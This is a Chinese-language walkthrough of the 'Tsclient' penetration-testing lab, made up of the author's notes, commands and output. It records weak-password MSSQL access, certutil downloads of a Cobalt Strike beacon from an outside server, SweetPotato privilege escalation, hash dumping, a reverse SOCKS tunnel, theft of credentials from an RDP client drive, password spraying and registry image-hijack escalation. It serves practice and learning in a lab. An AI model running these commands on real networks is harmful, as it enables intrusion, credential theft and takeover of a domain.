春秋云镜：Tsclient

https://exp10it.cn/2023/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-tsclient-writeup/

https://fushuling.com/index.php/2023/08/29/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7tsclient/

https://ke1nys.github.io/posts/72d64c19.html

https://zysgmzb.club/index.php/archives/233

http://www.nooemotion.com/2023/01/25/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83-tsclient/

https://gkjzjh146.github.io/post/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83-tsclient/

https://v2ish1yan.github.io/2023/07/03/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C/Tsclient/

https://github.com/gloxec/CrossC2 //CrossC2

https://github.com/SafeGroceryStore/MDUT //MDUT

https://github.com/uknowsec/SweetPotato //SweetPotato，用那个new里的可执行文件，不然会有奇怪报错，卡了老久了

https://github.com/fortra/impacket //impacket

https://github.com/SecureAuthCorp/impacket //smbexec.py in impacket

https://github.com/BeichenDream/SharpToken //SharpToken

https://blog.csdn.net/weixin_39190897/article/details/118353886 //cs派生给msf

https://www.freebuf.com/articles/es/214551.html //镜像劫持

https://mp.weixin.qq.com/s/Aog7M_6XauRi96wFeRo6sg //tsclient

https://www.geekby.site/2021/01/%E7%BA%A2%E8%93%9D%E5%AF%B9%E6%8A%97%E4%B8%ADrdp%E5%8D%8F%E8%AE%AE%E7%9A%84%E5%88%A9%E7%94%A8/ //tsclient

https://www.c0bra.xyz/2021/01/11/RDP%E5%8F%8D%E5%90%91%E6%94%BB%E5%87%BB/ //tsclient

拓扑图：

172.22.8.15 XIAORANG\DC01 # 域控
172.22.8.31 XIAORANG\WIN19-CLIENT
172.22.8.46 WIN2016.xiaorang.lab
172.22.8.18 WIN-WEB # 本机

基础命令：

打开kali、proxifer、cs43

E:\02software\02development\13CobaltStrike45
E:\02software\02development\13CobaltStrike45\02fscan
E:\02software\03tools\18MDUT\Multiple.Database.Utilization.Tools-2.1.1
E:\02software\03tools\19SweetPotato
/home/kali/tools/impacket-master/examples

sudo su
vim /etc/proxychains4.conf
proxychains4 -f /etc/proxychains4.conf

shell C:\迅雷下载\chisel.exe client 39.105.51.11:28190 R:0.0.0.0:28191:socks

flag01

—信息收集

本地fscan扫网站，直接爆出mssql弱密码，sa/1qaz!QAZ

(base) PS E:\02software\02development\13CobaltStrike45\02fscan> ./fscan.exe -h 39.98.120.74

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.98.120.74:80 open
39.98.120.74:1433 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.98.120.74       code:200 len:703    title:IIS Windows Server
[+] mssql 39.98.120.74:1433:sa 1qaz!QAZ
已完成 2/2
[*] 扫描结束,耗时: 9.1062095s

mssql利用

mssql弱口令，工具MDUT

上工具MDUT连接mssql【需要先激活组件在执行命令！】

whoami /priv

上传文件一直失败。。MDUT不好使

SweetPotato提权

权限过低，提权，使用SweetPotato

certutil -urlcache -split -f http://39.105.51.11/artifact_win32_listener28100.exe C:\windows\temp\a.exe
certutil -urlcache -split -f http://39.105.51.11/SweetPotato.exe C:\windows\temp\SweetPotato.exe

C:\迅雷下载\SweetPotato.exe -a whoami
C:\迅雷下载\SweetPotato.exe -a "type C:\Users\Administrator\flag\flag01.txt"
C:\迅雷下载\SweetPotato.exe -a "C:\迅雷下载\artifact_win32_listener28100.exe"

cs高权限上线，调整sleep时间

信息收集ipconfig、systeminfo、whoami /priv、查看用户信息shell net user、hashdump、查看在线用户shell quser || qwinst、shell net use发现john有共享文件、

beacon> shell ipconfig
[*] Tasked beacon to run: ipconfig
[+] host called home, sent: 39 bytes
[+] received output:

Windows IP 配置


以太网适配器 以太网 2:

   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::ed3a:23ea:dc17:cba3%8
   IPv4 地址 . . . . . . . . . . . . : 172.22.8.18
   子网掩码  . . . . . . . . . . . . : 255.255.0.0
   默认网关. . . . . . . . . . . . . : 172.22.255.253

隧道适配器 Teredo Tunneling Pseudo-Interface:

   连接特定的 DNS 后缀 . . . . . . . : 
   IPv6 地址 . . . . . . . . . . . . : 2001:0:348b:fb58:80a:607:d89d:87b5
   本地链接 IPv6 地址. . . . . . . . : fe80::80a:607:d89d:87b5%12
   默认网关. . . . . . . . . . . . . : ::

隧道适配器 isatap.{7901C223-3BC4-42B0-BD21-258AA6858209}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开连接
   连接特定的 DNS 后缀 . . . . . . . : 

beacon> shell systeminfo
[*] Tasked beacon to run: systeminfo
[+] host called home, sent: 41 bytes
[+] received output:

主机名:           WIN-WEB
OS 名称:          Microsoft Windows Server 2016 Datacenter
OS 版本:          10.0.14393 暂缺 Build 14393
OS 制造商:        Microsoft Corporation
OS 配置:          独立服务器
OS 构件类型:      Multiprocessor Free
注册的所有人:     
注册的组织:       Aliyun
产品 ID:          00376-40000-00000-AA947
初始安装日期:     2022/7/11, 12:46:14
系统启动时间:     2023/11/27, 12:59:25
系统制造商:       Alibaba Cloud
系统型号:         Alibaba Cloud ECS
系统类型:         x64-based PC
处理器:           安装了 1 个处理器。
                  [01]: Intel64 Family 6 Model 85 Stepping 4 GenuineIntel ~2500 Mhz
BIOS 版本:        SeaBIOS 449e491, 2014/4/1
Windows 目录:     C:\Windows
系统目录:         C:\Windows\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (UTC+08:00) 北京，重庆，香港特别行政区，乌鲁木齐
物理内存总量:     4,095 MB
可用的物理内存:   1,773 MB
虚拟内存: 最大值: 4,799 MB
虚拟内存: 可用:   1,400 MB
虚拟内存: 使用中: 3,399 MB
页面文件位置:     C:\pagefile.sys
域:               WORKGROUP
登录服务器:       暂缺
修补程序:         安装了 6 个修补程序。
                  [01]: KB5013625
                  [02]: KB4049065
                  [03]: KB4486129
                  [04]: KB4486131
                  [05]: KB5014026
                  [06]: KB5013952
网卡:             安装了 1 个 NIC。
                  [01]: Red Hat VirtIO Ethernet Adapter
                      连接名:      以太网 2
                      启用 DHCP:   是
                      DHCP 服务器: 172.22.255.253
                      IP 地址
                        [01]: 172.22.8.18
                        [02]: fe80::ed3a:23ea:dc17:cba3
Hyper-V 要求:     已检测到虚拟机监控程序。将不显示 Hyper-V 所需的功能。

beacon> shell whoami /priv
[*] Tasked beacon to run: whoami /priv
[+] host called home, sent: 43 bytes
[+] received output:

特权信息
----------------------

特权名                        描述                 状态  
============================= ==================== ======
SeAssignPrimaryTokenPrivilege 替换一个进程级令牌   已禁用
SeIncreaseQuotaPrivilege      为进程调整内存配额   已禁用
SeChangeNotifyPrivilege       绕过遍历检查         已启用
SeImpersonatePrivilege        身份验证后模拟客户端 已启用
SeCreateGlobalPrivilege       创建全局对象         已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集       已禁用

beacon> shell net user
[*] Tasked beacon to run: net user
[+] host called home, sent: 39 bytes
[+] received output:

\\ 的用户帐户

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest                    
John                     
命令运行完毕，但发生一个或多个错误。

使用管理会话

beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82541 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2caf35bb4c5059a3d50599844e2b9b1f:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
John:1008:aad3b435b51404eeaad3b435b51404ee:eec9381b043f098b011be51622282027:::

beacon> sleep 2
[*] Tasked beacon to sleep for 2s
beacon> shell quser || qwinst
[*] Tasked beacon to run: quser || qwinst
[+] host called home, sent: 62 bytes
[+] received output:
 用户名                会话名             ID  状态    空闲时间   登录时间
 john                  rdp-tcp#0           2  运行中         21  2023/11/27 13:01

获得john用户的shell

beacon> sleep 2
[*] Tasked beacon to sleep for 2s
beacon> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 54 bytes
[+] received output:
会记录新的网络连接。


状态       本地        远程                      网络

-------------------------------------------------------------------------------
                       \\TSCLIENT\C              Microsoft Terminal Services
命令成功完成。

flag{cb62ebab-a97f-490d-be87-c2df06e3c173}

flag02

在C:\windows\tmp\下传文件，fscan.exe、chisel.exe等工具、shell net user发现还有一个john用户、进程注入上线john、shell net use发现john有共享文件\\TSCLIENT\C、查看\\tsclient\c\credential.txt文件shell -c “type \tsclient\c\credential.txt”、得到域的用户名和密码xiaorang.lab\Aldrich:Ald@rLMWuy7z!#提示了hijack Image映像劫持、喷洒密码proxychains4 -q crackmapexec smb 172.22.8.0/24 -u “Aldrich” -p “Ald@rLMWuy7z!#”、登录密码过期修改密码proxychains4 python3 smbpasswd.py xiaorang.lab/Aldrich:‘Ald@rLMWuy7z!#‘@172.22.8.15 -newpass ‘Whoami@666’、rdt远程登录桌面172.22.8.46、46机器不出网 用18转发流量上线cs、pivoting—listener—172.22.8.18创建listener 然后生成beacon利用rdt拖到46机器上、映像劫持提权 先查看权限 get-acl -path “HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options” | fl * 、发现所有用户都可以修改注册表 利用此性质修改注册表映像劫持 使用放大镜提权 用户主页点击放大镜启动magnify.exe换成C:\windows\system32\cmd.exe 、REG ADD “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe” /v Debugger /t REG_SZ /d “C:\windows\system32\cmd.exe”、锁定用户右键放大镜直接就进入system权限此时上线beacon、shell type C:\Users\Administrator\flag\flag02.txt、

cs注入在线用户进程上线

在C:\windows\tmp\下传文件，fscan.exe、chisel.exe等工具、

shell net user发现还有一个john用户、

进程注入上线john、

tsclient

shell net use发现john有共享文件\\TSCLIENT\C、

查看\\tsclient\c\credential.txt文件shell -c “type \tsclient\c\credential.txt”、

beacon> shell type \\tsclient\c\credential.txt
[*] Tasked beacon to run: type \\tsclient\c\credential.txt
[+] host called home, sent: 63 bytes
[+] received output:
xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

Do you know how to hijack Image?

映像劫持

得到域的用户名和密码xiaorang.lab\Aldrich:Ald@rLMWuy7z!#提示了hijack Image映像劫持、

喷洒密码proxychains4 -f /etc/proxychains4.conf crackmapexec smb 172.22.8.0/24 -u “Aldrich” -p ‘Ald@rLMWuy7z!#’、

┌──(root㉿kali)-[/home/kali]
└─# proxychains4 -f /etc/proxychains4.conf crackmapexec smb 172.22.8.0/24 -u "Aldrich" -p 'Ald@rLMWuy7z!#'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
/usr/lib/python3/dist-packages/paramiko/transport.py:236: CryptographyDeprecationWarning: Blowfish has been deprecated
  "class": algorithms.Blowfish,
[proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.4:445  ...  172.22.8.3:445  ...  172.22.8.0:445  ...  172.22.8.1:445  ...  172.22.8.2:445 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.6:445  ...  172.22.8.5:445  ...  172.22.8.7:445 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.8:445  ...  172.22.8.9:445  ...  172.22.8.13:445  ...  172.22.8.10:445  ...  172.22.8.11:445  ...  172.22.8.12:445  ...  172.22.8.15:445  ...  172.22.8.17:445  ...  172.22.8.16:445  ...  172.22.8.18:445  ...  172.22.8.14:445  ...  172.22.8.20:445  ...  172.22.8.19:445  ...  172.22.8.21:445  ...  172.22.8.23:445  ...  172.22.8.24:445  ...  172.22.8.22:445  ...  172.22.8.26:445  ...  172.22.8.25:445  ...  172.22.8.28:445 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.27:445  ...  172.22.8.33:445  ...  172.22.8.70:445  ...  172.22.8.44:445  ...  172.22.8.29:445  ...  172.22.8.41:445  ...  172.22.8.68:445  ...  172.22.8.39:445  ...  172.22.8.90:445  ...  172.22.8.97:445 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  OK
 ...  172.22.8.55:445  ...  172.22.8.38:445  ...  172.22.8.74:445  ...  172.22.8.78:445  ...  172.22.8.53:445  ...  172.22.8.75:445  ...  172.22.8.58:445  ...  172.22.8.54:445  ...  172.22.8.61:445  ...  172.22.8.69:445  ...  172.22.8.95:445  ...  172.22.8.59:445  ...  172.22.8.43:445  ...  172.22.8.83:445  ...  172.22.8.57:445  ...  172.22.8.62:445  ...  172.22.8.47:445  ...  172.22.8.93:445  ...  172.22.8.40:445  ...  172.22.8.45:445  ...  172.22.8.42:445  ...  172.22.8.49:445  ...  172.22.8.30:445  ...  172.22.8.60:445  ...  172.22.8.73:445  ...  172.22.8.79:445  ...  172.22.8.50:445  ...  172.22.8.63:445  ...  172.22.8.87:445  ...  172.22.8.65:445  ...  172.22.8.52:445  ...  172.22.8.80:445  ...  172.22.8.84:445  ...  172.22.8.85:445  ...  172.22.8.99:445  ...  172.22.8.56:445  ...  172.22.8.88:445  ...  172.22.8.51:445  ...  172.22.8.98:445  ...  172.22.8.34:445  ...  OK
 ...  172.22.8.72:445  ...  172.22.8.31:445  ...  172.22.8.91:445  ...  172.22.8.67:445  ...  172.22.8.66:445  ...  172.22.8.82:445  ...  172.22.8.71:445  ...  172.22.8.48:445  ...  172.22.8.89:445  ...  172.22.8.35:445  ...  172.22.8.37:445  ...  172.22.8.36:445  ...  172.22.8.81:445  ...  172.22.8.32:445  ...  172.22.8.94:445  ...  172.22.8.100:445  ...  172.22.8.76:445  ...  172.22.8.86:445  ...  172.22.8.92:445  ...  172.22.8.77:445  ...  172.22.8.96:445  ...  172.22.8.46:445  ...  172.22.8.64:445 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.15:445  ...  OK
 ...  OK
[proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  OK
 ...  172.22.8.18:135  ...  172.22.8.31:445 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  OK
 ...  OK
 ...  172.22.8.46:135 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.15:135  ...  OK
[proxychains] Dynamic chain  ...  39.105.51.11:28191 SMB         172.22.8.18     445    WIN-WEB          [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-WEB) (domain:WIN-WEB) (signing:False) (SMBv1:True)
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.31:135  ...  OK
 ...  172.22.8.18:445 SMB         172.22.8.46     445    WIN2016          [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN2016) (domain:xiaorang.lab) (signing:False) (SMBv1:True)
 ...  OK
 ...  OK
SMB         172.22.8.15     445    DC01             [*] Windows 10.0 Build 20348 x64 (name:DC01) (domain:xiaorang.lab) (signing:True) (SMBv1:False)
SMB         172.22.8.31     445    WIN19-CLIENT     [*] Windows 10.0 Build 17763 x64 (name:WIN19-CLIENT) (domain:xiaorang.lab) (signing:False) (SMBv1:False)
SMB         172.22.8.18     445    WIN-WEB          [-] WIN-WEB\Aldrich:Ald@rLMWuy7z!# STATUS_LOGON_FAILURE 
[proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.101:445  ...  172.22.8.46:445  ...  OK
SMB         172.22.8.46     445    WIN2016          [-] xiaorang.lab\Aldrich:Ald@rLMWuy7z!# STATUS_LOGON_FAILURE 
[proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.15:445  ...  172.22.8.102:445  ...  OK
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.15:445  ...  OK
SMB         172.22.8.15     445    DC01             [-] xiaorang.lab\Aldrich:Ald@rLMWuy7z!# STATUS_LOGON_FAILURE 
[proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.103:445  ...  172.22.8.31:445  ...  OK
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.31:445  ...  OK
SMB         172.22.8.31     445    WIN19-CLIENT     [-] xiaorang.lab\Aldrich:Ald@rLMWuy7z!# STATUS_LOGON_FAILURE 
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.104:445 <--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
<--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
<--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.0:445  ...  172.22.8.5:445  ...  172.22.8.8:445  ...  172.22.8.2:445  ...  172.22.8.4:445  ...  172.22.8.9:445  ...  172.22.8.26:445  ...  172.22.8.23:445  ...  172.22.8.17:445  ...  172.22.8.19:445  ...  172.22.8.22:445  ...  172.22.8.16:445  ...  172.22.8.12:445  ...  172.22.8.7:445  ...  172.22.8.10:445  ...  172.22.8.6:445  ...  172.22.8.21:445 <--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.20:445  ...  172.22.8.24:445  ...  172.22.8.1:445  ...  172.22.8.13:445  ...  172.22.8.25:445  ...  172.22.8.3:445  ...  172.22.8.14:445  ...  172.22.8.28:445  ...  172.22.8.11:445 <--socket error or timeout!
<--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.105:445 <--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.33:445 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.27:445 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.97:445  ...  172.22.8.70:445  ...  172.22.8.41:445  ...  172.22.8.29:445  ...  172.22.8.39:445  ...  172.22.8.68:445  ...  172.22.8.44:445  ...  172.22.8.90:445 <--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.38:445  ...  172.22.8.75:445 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.58:445 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.85:445  ...  172.22.8.53:445  ...  172.22.8.74:445  ...  172.22.8.79:445  ...  172.22.8.88:445 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  